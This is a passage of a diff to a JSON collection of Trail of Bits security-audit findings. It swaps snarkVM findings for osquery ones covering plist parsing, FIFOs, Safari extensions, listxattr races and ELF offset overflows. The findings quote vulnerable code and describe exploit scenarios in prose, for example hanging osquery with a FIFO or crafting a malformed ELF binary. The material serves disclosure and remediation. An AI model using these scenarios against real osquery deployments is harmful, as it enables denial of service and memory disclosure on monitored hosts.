which eliminates the possibility of an adversary using the race condition; therefore, refactoring may not be necessary in this method. Add comments to these methods describing possible adverse eects. Long term, refactor the interface of PlatformFile to contain the potential race issues within the class. For example, move the safePermissions function into the PlatformFile class so that hasSafePermissions is not exposed outside of the class. 25 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Medium" ] }, { - "title": "20. Inconsistent and random compiler error message ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When the compiler nds a type mismatch between arguments and expected parameters, it emits an error message containing a dierent integer each time the code is compiled. Figure 20.1 shows an Aleo program that, when compiled twice, shows two dierent error messages (shown in gure 20.2). The error message also states that u8 is invalid, but at the same time expecting u8 . program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; function compute: input r0 as i8.private; input r1 as i8.public; call clo r0 r1 into r2; // r1 is i8 but the closure requires u8 output r2 as i8.private; Figure 20.1: Aleo program ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1537 ms) 'u8' is invalid : expected u8, found 124i8 ~/Documents/aleo/foo (testnet3?) $ aleo build Compiling 'main.aleo'... Loaded universal setup (in 1487 ms) 'u8' is invalid : expected u8, found -39i8 Figure 20.2: Two compilation results Figure 20.3 shows the check that validates that the types match and shows the error message containing the actual literal instead of literal.to_type() : Plaintext::Literal(literal, ..) => { // Ensure the literal type matches. match literal.to_type() == *literal_type { true => Ok (()), false => bail!( \"'{ plaintext_type }' is invalid: expected {literal_type}, found { literal }\" ), Figure 20.3: vm/compiler/src/process/stack/helpers/matches.rs#L204-L209 Recommendations Short term, clarify the error message by rephrasing it and presenting only the literal type instead of the full literal.", + "title": "7. No limit on the amount of data that parsePlist can parse ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "To support several macOS-specic tables, osquery contains a function called osquery::parsePlist, which reads and parses property list (.plist) les by using the Apple Foundation framework class NSPropertyListSerialization. The parsePlist function is used by tables such as browser_plugins and xprotect_reports to read user-accessible les. The function does not have any limit on the amount of data that it will parse. id ns_path = [NSString stringWithUTF8String:path.string().c_str()]; id stream = [NSInputStream inputStreamWithFileAtPath:ns_path]; if (stream == nil) { return Status(1, \"Unable to read plist: \" + path.string()); } // Read file content into a data object, containing potential plist data. NSError* error = nil; [stream open]; id plist_data = [NSPropertyListSerialization propertyListWithStream:stream options:0 format:NULL error:&error]; Figure 7.1: The parsePlist implementation does not have a limit on the amount of data that it can deserialize. 26 Atlassian: osquery Security Assessment auto info_path = path + \"/Contents/Info.plist\"; // Ensure that what we're processing is actually a plug-in. if (!pathExists(info_path)) { return; } if (osquery::parsePlist(info_path, tree).ok()) { // Plugin did not include an Info.plist, or it was invalid for (const auto& it : kBrowserPluginKeys) { r[it.second] = tree.get(it.first, \"\"); // Convert bool-types to an integer. jsonBoolAsInt(r[it.second]); } } Figure 7.2: browser_plugins uses parsePlist on user-controlled les. Exploit Scenario An attacker crafts a large, valid .plist le and stores it in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist on a macOS system running the osquery daemon. When osquery executes a query using the browser_plugins table, it reads and parses the complete le, causing high resource consumption. Recommendations Short term, modify the browser_plugins and xprotect_reports tables to enforce a maximum le size (e.g., by combining readFile and parsePlistContent). Long term, to prevent this issue in future tables, consider removing the parsePlist function or rewriting it as a helper function around a safer implementation. 27 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Informational" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "21. Instruction add_* methods incorrectly compare maximum number of allowed instructions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "During function and closure parsing, the compiler collects input, regular, and output instructions into three dierent IndexSet s in the add_input , add_instruction , and add_output functions. All of these functions check that the current number of elements in their respective IndexSet does not exceed the maximum allowed number. However, the check is done before inserting the element in the set, allowing inserting in a set that is already at full capacity and creating a set with one element more than the maximum. Figure 21.1 shows the comparison between the current and the maximum number of allowed elements and the subsequent insertion, which is allowed even though the set could already be at full capacity. All add_input , add_instruction , and add_output functions for both the Function and Closure types present similar behavior. Note that although the number of input and output instructions is checked in other locations (e.g., on the add_closure or get_closure functions), the number of regular instructions is not checked there, allowing a function or a closure with 1 + N::MAX_INSTRUCTIONS . fn add_output (& mut self , output: Output ) -> Result <()> { // Ensure there are input statements and instructions in memory. ensure!(! self .inputs.is_empty(), \"Cannot add outputs before inputs have been added\" ); ensure!(! self .instructions.is_empty(), \"Cannot add outputs before instructions have been added\" ); // Ensure the maximum number of outputs has not been exceeded. ensure!( self .outputs.len() <= N::MAX_OUTPUTS , \"Cannot add more than {} outputs\" , N::MAX_OUTPUTS); // Insert the output statement. self .outputs.insert(output); Ok (()) } Figure 21.1: vm/compiler/src/program/function/mod.rs#L142-L153 Figure 21.1 shows another issue present only in the add_output functions (for both Function and Closure types): When an output instruction is inserted into the set, no check validates if this particular element is already in the set, replacing the previous element with the same key if present. This causes two output statements to be interpreted as a single one: program main.aleo; closure clo: input r0 as i8; input r1 as u8; pow r0 r1 into r2; output r2 as i8; output r2 as i8; function compute: input r0 as i8.private; input r1 as u8.public; call clo r0 r1 into r2 ; output r2 as i8.private; Figure 21.2: Test program Recommendations Short term, we recommend the following actions: Modify the checks to validate the maximum number of allowed instructions to prevent the o-by-one error. Validate if outputs are already present in the Function and Closure sets before inserting an output. Add checks to validate the maximum number of instructions in the get_closure , get_function , add_closure , and add_function functions.", + "title": "8. The parsePlist function can hang on reading certain les ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery codebase contains a function called osquery::parsePlist, which reads and parses .plist les. This function opens the target le directly by using the inputStreamWithFileAtPath method from NSInputStream, as shown in gure 7.1 in the previous nding, and passes the resulting input stream to NSPropertyListSerialization for direct consumption. However, parsePlist can hang on reading certain les. For example, if the le to be read is a FIFO, the function blocks the osquery thread until another program or thread opens the FIFO to write to it. Exploit Scenario An attacker creates a FIFO le on a macOS device in ~/Library/Internet Plug-Ins/foo/Contents/Info.plist or ~/Library/Logs/DiagnosticReports/XProtect-foo using the mkfifo command. The osquery agent attempts to open and read the le when building a response for queries on the browser_plugins and xprotect_reports tables, but parsePlist blocks the osquery thread indenitely, leaving osquery unable to respond to the query request. Recommendations Short term, implement a check in parsePlist to verify that the .plist le to be read is not a special le. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. Also consider replacing parsePlist in favor of the parsePlistContent function and standardizing all le reads on a single code path to prevent similar issues going forward. 28 Atlassian: osquery Security Assessment 9. The parseJSON function can hang on reading certain les on Linux and macOS Severity: Medium Diculty: Low Type: Denial of Service Finding ID: TOB-ATL-9 Target: osquery/filesystem/filesystem.cpp", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "22. Instances of unchecked zip_eq can cause runtime errors ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The zip_eq operator requires that both iterators being zipped have the same length, and panics if they do not. In addition to the cases presented in TOB-ALEOA-5 , we found one more instance where this should be checked: // Retrieve the interface and ensure it is defined in the program. let interface = stack.program().get_interface(&interface_name)?; // Initialize the interface members. let mut members = IndexMap::new(); for (member, (member_name, member_type)) in inputs.iter(). zip_eq (interface.members()) { Figure 22.1: compiler/src/program/instruction/operation/cast.rs#L92-L99 Additionally, we found uses of the zip operator that should be replaced by zip_eq , together with an associated check to validate the equal length of their iterators: /// Checks that the given operands matches the layout of the interface. The ordering of the operands matters. pub fn matches_interface (& self , stack: & Stack , operands: & [Operand], interface: & Interface ) -> Result <()> { // Ensure the operands is not empty. if operands.is_empty() { bail!( \"Casting to an interface requires at least one operand\" ) } // Ensure the operand types match the interface. for (operand, (_, member_type)) in operands.iter(). zip (interface.members()) { Figure 22.2: vm/compiler/src/process/register_types/matches.rs#L20-L27 for (operand, (_, entry_type)) in operands.iter().skip( 2 ). zip (record_type.entries()) { Figure 22.3: vm/compiler/src/process/register_types/matches.rs#L106-L107 Exploit Scenario An incorrectly typed program causes the compiler to panic due to a mismatch between the number of arguments in a cast and the number of elements in the casted type. Recommendations Short term, add checks to validate the equal length of the iterators being zipped and replace the uses of zip with zip_eq together with the associated length validations.", + "title": "10. No limit on the amount of data read or expanded from the Safari extensions table ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The safari_extensions table allows the agent to query installed Safari extensions on a certain user prole. Said extensions consist of extensible archive format (XAR) compressed archives with the .safariextz le extension, which are stored in the ~/Library/Safari/Extensions folder. The osquery program does not have a limit on the amount of data that can be processed when reading and inating the Safari extension contents; a large amount of data may cause a denial of service. 31 Atlassian: osquery Security Assessment xar_t xar = xar_open(path.c_str(), READ); if (xar == nullptr) { TLOG << \"Cannot open extension archive: \" << path; return; } xar_iter_t iter = xar_iter_new(); xar_file_t xfile = xar_file_first(xar, iter); size_t max_files = 500; for (size_t index = 0; index < max_files; ++index) { if (xfile == nullptr) { break; } char* xfile_path = xar_get_path(xfile); if (xfile_path == nullptr) { break; } // Clean up the allocated content ASAP. std::string entry_path(xfile_path); free(xfile_path); if (entry_path.find(\"Info.plist\") != std::string::npos) { if (xar_verify(xar, xfile) != XAR_STREAM_OK) { TLOG << \"Extension info extraction failed verification: \" << path; } size_t size = 0; char* buffer = nullptr; if (xar_extract_tobuffersz(xar, xfile, &buffer, &size) != 0 || size == 0) { break; } std::string content(buffer, size); free(buffer); pt::ptree tree; if (parsePlistContent(content, tree).ok()) { for (const auto& it : kSafariExtensionKeys) { r[it.second] = tree.get(it.first, \"\"); } } break; } 32 Atlassian: osquery Security Assessment xfile = xar_file_next(iter); } Figure 10.1: genSafariExtension extracts the full Info.plist to memory. Exploit Scenario An attacker crafts a valid extension containing a large Info.plist le and stores it in ~/Library/Safari/Extensions/foo.safariextz. When the osquery agent attempts to respond to a query on the safari_extensions table, it opens the archive and expands the full Info.plist le in memory, causing high resource consumption. Recommendations Short term, enforce a limit on the amount of information that can be extracted from an XAR archive. Long term, add guidelines to the development documentation on handling untrusted input data. For instance, advise developers to limit the amount of data that may be ingested, processed, or read from untrusted sources such as user-writable les. Enforce said guidelines by performing code reviews on new contributions. 33 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "23. Hash functions lack domain separation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The BHP hash function takes as input a collection of booleans, and hashes them. This hash is used to commit to a Record , hashing together the bits of program_id , the record_name , and the record itself. However, no domain separation or input length is added to the hash, allowing a hash collision if a types to_bits_le function returns variable-length arrays: impl Record> { /// Returns the record commitment. pub fn to_commitment (& self , program_id: & ProgramID , record_name: & Identifier ) -> Result > { // Construct the input as `(program_id || record_name || record)`. let mut input = program_id.to_bits_le(); input.extend(record_name.to_bits_le()); input.extend( self .to_bits_le()); // Compute the BHP hash of the program record. N::hash_bhp1024(&input) } } Figure 23.1: console/program/src/data/record/to_commitment.rs#L19-L29 A similar situation is present on the hash_children function, which is used to compute hashes of two nodes in a Merkle tree: impl PathHash for BHP { type Hash = Field; /// Returns the hash of the given child nodes. fn hash_children (& self , left: & Self ::Hash, right: & Self ::Hash) -> Result < Self ::Hash> { // Prepend the nodes with a `true` bit. let mut input = vec! [ true ]; input.extend(left.to_bits_le()); input.extend(right.to_bits_le()); // Hash the input. Hash::hash( self , &input) } } Figure 23.2: circuit/collections/src/merkle_tree/helpers/path_hash.rs#L33-L47 If the implementations of the to_bits_le functions return variable length arrays, it would be easy to create two dierent inputs that would result in the same hash. Recommendations Short term, either enforce each types to_bits_le function to always be xed length or add the input length and domain separators to the elements to be hashed by the BHP hash function. This would prevent the hash collisions even if the to_bits_le functions were changed in the future.", + "title": "11. Extended attributes table may read uninitialized or out-of-bounds memory ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The extended_attributes table calls the listxattr function twice: rst to query the extended attribute list size and then to actually retrieve the list of attribute names. Additionally, the return values from the function calls are not checked for errors. This leads to a race condition in the parseExtendedAttributeList osquery function, in which the content buer is left uninitialized if the target le is deleted in the time between the two listxattr calls. As a result, std::string will consume uninitialized and unbounded memory, potentially leading to out-of-bounds memory reads. std::vector attributes; ssize_t value = listxattr(path.c_str(), nullptr, (size_t)0, 0); char* content = (char*)malloc(value); if (content == nullptr) { return attributes; } ssize_t ret = listxattr(path.c_str(), content, value, 0); if (ret == 0) { free(content); return attributes; } char* stable = content; do { attributes.push_back(std::string(content)); content += attributes.back().size() + 1; } while (content - stable < value); free(stable); return attributes; Figure 11.1: parseExtendedAttributeList calls listxattr twice. 34 Atlassian: osquery Security Assessment Exploit Scenario An attacker creates and runs a program to race osquery while it is fetching extended attributes from the le system. The attacker is successful and causes the osquery agent to crash with a segmentation fault. Recommendations Short term, rewrite the aected code to check the return values for errors. Replace listxattr with flistxattr, which operates on opened le descriptors, allowing it to continue to query extended attributes even if the le is removed (unlink-ed) from the le system. Long term, establish and enforce best practices for osquery contributions by leveraging automated tooling and code reviews to prevent similar issues from reoccurring. For example, use le descriptors instead of le paths when you need to perform more than one operation on a le to ensure that the le is not deleted or replaced mid-operation. Consider using static analysis tools such as CodeQL to look for other instances of similar issues in the code and to detect new instances of the problem on new contributions. 35 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4502,39 +7190,29 @@ ] }, { - "title": "24. Deployment constructor does not enforce the network edition value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Deployment type includes the edition value, which should match the network edition value. However, this is not enforced in the deployment constructor as it is in the Execution constructor. impl Deployment { /// Initializes a new deployment. pub fn new ( edition: u16 , program: Program , verifying_keys: IndexMap , (VerifyingKey, Certificate)>, ) -> Result < Self > { Ok ( Self { edition, program, verifying_keys }) } } Figure 24.1: vm/compiler/src/process/deployment/mod.rs#L37-L44 Recommendations Short term, consider using the N::EDITION value in the Deployment constructor, similarly to the Execution constructor.", - "labels": [ - "Trail of Bits", - "Severity: Informational", - "Difficulty: Informational" - ] - }, - { - "title": "25. Map insertion return value is ignored ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "Some insertions into hashmap data types ignore whether the insertion overwrote an element already present in the hash map. For example, when handling the proving and verifying key index maps, the Optional return value from the insert function is ignored: #[inline] pub fn insert_proving_key (& self , function_name: & Identifier , proving_key: ProvingKey ) { self .proving_keys.write().insert(*function_name, proving_key); } /// Inserts the given verifying key for the given function name. #[inline] pub fn insert_verifying_key (& self , function_name: & Identifier , verifying_key: VerifyingKey ) { self .verifying_keys.write().insert(*function_name, verifying_key); } Figure 25.1: vm/compiler/src/process/stack/mod.rs#L336-L346 Other examples of ignored insertion return values are present in the codebase and can be found using the regular expression \\.insert.*\\); . Recommendations Short term, investigate if any of the unguarded map insertions should be checked.", + "title": "12. The readFile function can hang on reading a le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The readFile function is used to provide a standardized way to read les. It uses the read_max variable to prevent the functions from reading excessive amounts of data. It also selects one of two modes, blocking or non-blocking, depending on the le properties. When using the blocking approach, it reads block_size-sized chunks of the le, with a minimum of 4,096 bytes, and returns the chunks to the caller. However, the call to read can block the osquery thread when reading certain les. if (handle.blocking_io) { // Reset block size to a sane minimum. block_size = (block_size < 4096) ? 4096 : block_size; ssize_t part_bytes = 0; bool overflow = false; do { std::string part(block_size, '\\0'); part_bytes = handle.fd->read(&part[0], block_size); if (part_bytes > 0) { total_bytes += static_cast(part_bytes); if (total_bytes >= read_max) { return Status::failure(\"File exceeds read limits\"); } if (file_size > 0 && total_bytes > file_size) { overflow = true; part_bytes -= (total_bytes - file_size); } predicate(part, part_bytes); } } while (part_bytes > 0 && !overflow); } else { Figure 12.1: The blocking_io ow can stall. 36 Atlassian: osquery Security Assessment Exploit Scenario An attacker creates a symlink to /dev/tty in a path known to be read by the osquery agent. When the osquery agent attempts to read the le, it stalls. Recommendations Short term, ensure that the le operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. 37 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Informational" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "26. Potential truncation on reading and writing Programs, Deployments, and Executions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When writing a Program to bytes, the number of import statements and identiers are casted to an u8 integer, leading to the truncation of elements if there are more than 256 identiers: // Write the number of program imports. ( self .imports.len() as u8 ).write_le(& mut writer)?; // Write the program imports. for import in self .imports.values() { import.write_le(& mut writer)?; } // Write the number of components. ( self .identifiers.len() as u8 ).write_le(& mut writer)?; Figure 26.1: vm/compiler/src/program/bytes.rs#L73-L81 During Program parsing, this limit of 256 identiers is never enforced. Similarly, the Execution and Deployment write_le functions assume that there are fewer than u16::MAX transitions and verifying keys, respectively. // Write the number of transitions. ( self .transitions.len() as u16 ).write_le(& mut writer)?; Figure 26.2: vm/compiler/src/process/execution/bytes.rs#L52-L53 // Write the number of entries in the bundle. ( self .verifying_keys.len() as u16 ).write_le(& mut writer)?; Figure 26.3: vm/compiler/src/process/deployment/bytes.rs#L62-L63 Recommendations Short term, determine a maximum number of allowed import statements and identiers and enforce this bound on Program parsing. Then, guarantee that the integer type used in the write_le function includes this bound. Perform the same analysis for the Execution and Deployment functions.", + "title": "13. The POSIX PlatformFile constructor may block the osquery thread ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The POSIX implementation of PlatformFiles constructor uses the open syscall to obtain a handle to the le. If the le to be opened is a FIFO, the call to open blocks the osquery thread unless the O_NONBLOCK ag is used. There are several places in the codebase in which the constructor is called without the PF_NONBLOCK ag set; all of these calls may stall on opening a FIFO. PlatformFile::PlatformFile(const fs::path& path, int mode, int perms) : fname_(path) { ... if ((mode & PF_NONBLOCK) == PF_NONBLOCK) { oflag |= O_NONBLOCK; is_nonblock_ = true; } if ((mode & PF_APPEND) == PF_APPEND) { oflag |= O_APPEND; } if (perms == -1 && may_create) { perms = 0666; } boost::system::error_code ec; if (check_existence && (!fs::exists(fname_, ec) || ec.value() != errc::success)) { handle_ = kInvalidHandle; } else { handle_ = ::open(fname_.c_str(), oflag, perms); } } Figure 13.1: The POSIX PlatformFile constructor 38 Atlassian: osquery Security Assessment ./filesystem/file_compression.cpp:26: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:32: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:102: PlatformFile inFile(in, PF_OPEN_EXISTING | PF_READ); ./filesystem/file_compression.cpp:108: PlatformFile outFile(out, PF_CREATE_ALWAYS | PF_WRITE); ./filesystem/file_compression.cpp:177: PlatformFile pFile(f, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:242: PlatformFile fd(path, PF_OPEN_EXISTING | PF_WRITE); ./filesystem/filesystem.cpp:258: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./filesystem/filesystem.cpp:531: PlatformFile fd(path, PF_OPEN_EXISTING | PF_READ); ./carver/carver.cpp:230: PlatformFile src(srcPath, PF_OPEN_EXISTING | PF_READ); Figure 13.2: Uses of PlatformFile without PF_NONBLOCK Exploit Scenario An attacker creates a FIFO le that is opened by one of the functions above, stalling the osquery agent. Recommendations Short term, investigate the uses of PlatformFile to identify possible blocks. Long term, use a static analysis tool such as CodeQL to scan the code for instances in which uses of the open syscall block the osquery thread. 39 Atlassian: osquery Security Assessment 14. No limit on the amount of data the Carver::blockwiseCopy method can write Severity: Medium Diculty: Low Type: Denial of Service Finding ID: TOB-ATL-14 Target: osquery/carver/carver.cpp", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "27. StatePath::verify accepts invalid states ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The StatePath::verify function attempts to validate several properties in the transaction using the code shown in gure 28.1. However, this code does not actually check that all checks are true; it checks only that there are an even number of false booleans. Since there are six booleans in the operation, the function will return true if all are false. // Ensure the block path is valid. let check_block_hash = A::hash_bhp1024(&block_hash_preimage).is_equal(& self .block_hash); // Ensure the state root is correct. let check_state_root = A::verify_merkle_path_bhp(& self .block_path, & self .state_root, & self .block_hash.to_bits_le()); check_transition_path .is_equal(&check_transaction_path) .is_equal(&check_transactions_path) .is_equal(&check_header_path) .is_equal(&check_block_hash) .is_equal(&check_state_root) } Figure 27.1: vm/compiler/src/ledger/state_path/circuit/verify.rs#L57-L70 We marked the severity as informational since the function is still not being used. Exploit Scenario An attacker submits a StatePath where no checks hold, but the verify function still returns true. Recommendations Short term, ensure that all checks are true (e.g., by conjuncting all booleans and checking that the resulting boolean is true).", + "title": "15. The carves table truncates large le sizes to 32 bits ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The enumerateCarves function uses rapidjson::Value::GetInt() to retrieve a size value from a JSON string. The GetInt return type is int, so it cannot represent sizes exceeding 32 bits; as a result, the size of larger les will be truncated. void enumerateCarves(QueryData& results, const std::string& new_guid) { std::vector carves; scanDatabaseKeys(kCarves, carves, kCarverDBPrefix); for (const auto& carveGuid : carves) { std::string carve; auto s = getDatabaseValue(kCarves, carveGuid, carve); if (!s.ok()) { VLOG(1) << \"Failed to retrieve carve GUID\"; continue; } JSON tree; s = tree.fromString(carve); if (!s.ok() || !tree.doc().IsObject()) { VLOG(1) << \"Failed to parse carve entries: \" << s.getMessage(); return; } Row r; if (tree.doc().HasMember(\"time\")) { r[\"time\"] = INTEGER(tree.doc()[\"time\"].GetUint64()); } if (tree.doc().HasMember(\"size\")) { r[\"size\"] = INTEGER(tree.doc()[\"size\"].GetInt()); } stringToRow(\"sha256\", r, tree); 42 Atlassian: osquery Security Assessment stringToRow(\"carve_guid\", r, tree); stringToRow(\"request_id\", r, tree); stringToRow(\"status\", r, tree); stringToRow(\"path\", r, tree); // This table can be used to request a new carve. // If this is the case then return this single result. auto new_request = (!new_guid.empty() && new_guid == r[\"carve_guid\"]); r[\"carve\"] = INTEGER((new_request) ? 1 : 0); results.push_back(r); } } } // namespace Figure 15.1: The enumerateCarves function truncates les of large sizes. Exploit Scenario An attacker creates a le on disk of a size that overows 32 bits by only a small amount, such as 0x100001336. The carves tables reports the le size incorrectly as 0x1336 bytes. The attacker bypasses checks based on the reported le size. Recommendations Short term, use GetUint64 instead of GetInt to retrieve the le size. Long term, use static analysis tools such as CodeQL to look for other instances in which a type of size int is retrieved from JSON and stored in an INTEGER eld. 43 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4542,9 +7220,9 @@ ] }, { - "title": "28. Potential panic in encryption/decryption circuit generation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The decrypt_with_randomizers and encrypt_with_randomizers functions do not check the length of the randomizers argument against the length of the underlying ciphertext and plaintext, respectively. This can cause a panic in the zip_eq call. Existing calls to the function seem safe, but since it is a public function, the lengths of its underlying values should be checked to prevent panics in future code. pub ( crate ) fn decrypt_with_randomizers (& self , randomizers: & [Field]) -> Plaintext { // Decrypt the ciphertext. Plaintext::from_fields( & self .iter() .zip_eq(randomizers) Figure 28.1: circuit/program/src/data/ciphertext/decrypt.rs#L31-L36 Recommendations Short term, add a check to ensure that the length of the underlying plaintext/ciphertext matches the length of the randomizer values.", + "title": "16. The time table may not null-terminate strings correctly ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery time table uses strftime to format time information, such as the time zone name, into user-friendly strings. If the amount of information to be written does not t in the provided buer, strftime returns zero and leaves the buer contents in an undened state. QueryData genTime(QueryContext& context) { Row r; time_t osquery_time = getUnixTime(); struct tm gmt; gmtime_r(&osquery_time, &gmt); struct tm now = gmt; auto osquery_timestamp = toAsciiTime(&now); char local_timezone[5] = {0}; { } struct tm local; localtime_r(&osquery_time, &local); strftime(local_timezone, sizeof(local_timezone), \"%Z\", &local); char weekday[10] = {0}; strftime(weekday, sizeof(weekday), \"%A\", &now); char timezone[5] = {0}; strftime(timezone, sizeof(timezone), \"%Z\", &now); Figure 16.1: genTime uses strftime to get the time zone name and day of the week. The strings to be written vary depending on the locale conguration, so some strings may not t in the provided buer. The code does not check the return value of strftime and assumes that the string buer is always null-terminated, which may not always be the case. 44 Atlassian: osquery Security Assessment Exploit Scenario An attacker nds a way to change the time zone on a system in which %Z shows the full time zone name. When the osquery agent attempts to respond to a query on the time table, it triggers undened behavior. Recommendations Short term, add a check to verify the return value of each strftime call made by the table implementation. If the function returns zero, ensure that the system writes a valid string in the buer before it is used as part of the table response. Long term, perform code reviews on new contributions and consider using automated code analysis tools to prevent these kinds of issues from reoccurring. 45 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4552,19 +7230,19 @@ ] }, { - "title": "29. Variable timing of certain cryptographic functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Pedersen commitment code computes the masking element [r]h by ltering out powers of h not indicated by the randomizer r and adding the remaining values. However, the timing of this function leaks information about the randomizer value. In particular, it can reveal the Hamming weight (or approximate Hamming weight) of the randomizer. If the randomizer r is a 256-bit value, but timing indicates that the randomizer has a Hamming weight of 100 (for instance), then the possible set of randomizers has only about 2 243 elements. This compromises the information-theoretic security of the hiding property of the Pedersen commitment. randomizer.to_bits_le().iter().zip_eq(&* self .random_base_window).filter(|(bit, _)| **bit).for_each( |(_, base)| { output += base; }, ); Figure 29.1: console/algorithms/src/pedersen/commit_uncompressed.rs#L27-L33 Recommendations Short term, consider switching to a constant-time algorithm for computing the masking value.", + "title": "17. The elf_info table can crash the osquery agent ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The elf_info table uses the libelfin library to read properties of ELF les. The library maps the entire ELF binary into virtual memory and then uses memory accesses to read the data. Specically, the load method of the mmap_loader class returns a pointer to the data for a given oset and size. To ensure that the memory access stays within the bounds of the memory-mapped le, the library checks that the result of adding the oset and the size is less than the size of the le. However, this check does not account for the possibility of overows in the addition operation. For example, an oset of 0xffffffffffffffff and a size of 1 would overow to the value 0. This makes it possible to bypass the check and to create references to memory outside of the bounds. The elf_info table indirectly uses this function when loading section headers from an ELF binary. class mmap_loader : public loader { public: void *base; size_t lim; mmap_loader(int fd) { off_t end = lseek(fd, 0, SEEK_END); if (end == (off_t)-1) throw system_error(errno, system_category(), \"finding file length\"); lim = end; base = mmap(nullptr, lim, PROT_READ, MAP_SHARED, fd, 0); if (base == MAP_FAILED) throw system_error(errno, system_category(), \"mmap'ing file\"); close(fd); } ... 46 Atlassian: osquery Security Assessment const void *load(off_t offset, size_t size) { } }; if (offset + size > lim) throw range_error(\"offset exceeds file size\"); return (const char*)base + offset; Figure 17.1: The libenfin librarys limit check does not account for overows. Exploit Scenario An attacker knows of a writable path in which osquery scans ELF binaries. He creates a malformed ELF binary, causing the pointer returned by the vulnerable function to point to an arbitrary location. He uses this to make the osquery agent crash, leak information from the process memory, or circumvent address space layout randomization (ASLR). Recommendations Short term, work with the developers of the libelfbin project to account for overows in the check. Long term, implement the recommendations in TOB-ATL-2 to minimize the impact of similar issues. 47 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { "title": "1. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", - "body": "Sherlock has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Sherlock contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-spool-platformv2-securityreview.pdf", + "body": "Spool V2 has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity 